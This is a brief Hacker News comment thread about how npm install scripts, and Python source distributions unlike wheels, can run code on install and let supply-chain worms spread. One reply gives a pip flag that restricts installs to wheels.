Comment by Balinares

Comment by Balinares 5 days ago

2 replies

View on Hacker News

As far as I understand, NPM packages are not self-contained like e.g. Python wheels and can (and often need to) run scripts on install.

So just installing a package can get you compromised. If the compromised box contains credentials to update your own packages in NPM, then it's an easy vector for a worm to propagate.

magnetometer 5 days ago

Python wheels don't run arbitrary code on install, but source distributions do. And you can upload both to pypy. So you would have to run

pip install <package> --only-binary :all:

to only install wheels and fail otherwise.

Reply View 1 reply
  • Balinares 2 days ago

    Fair point -- I was only thinking wheels, but you are right.

    Would source distributions work as a vector for automated propagation, though? If I'm not mistaken, there's no universal standard for building from source distributions.

    Reply View 0 replies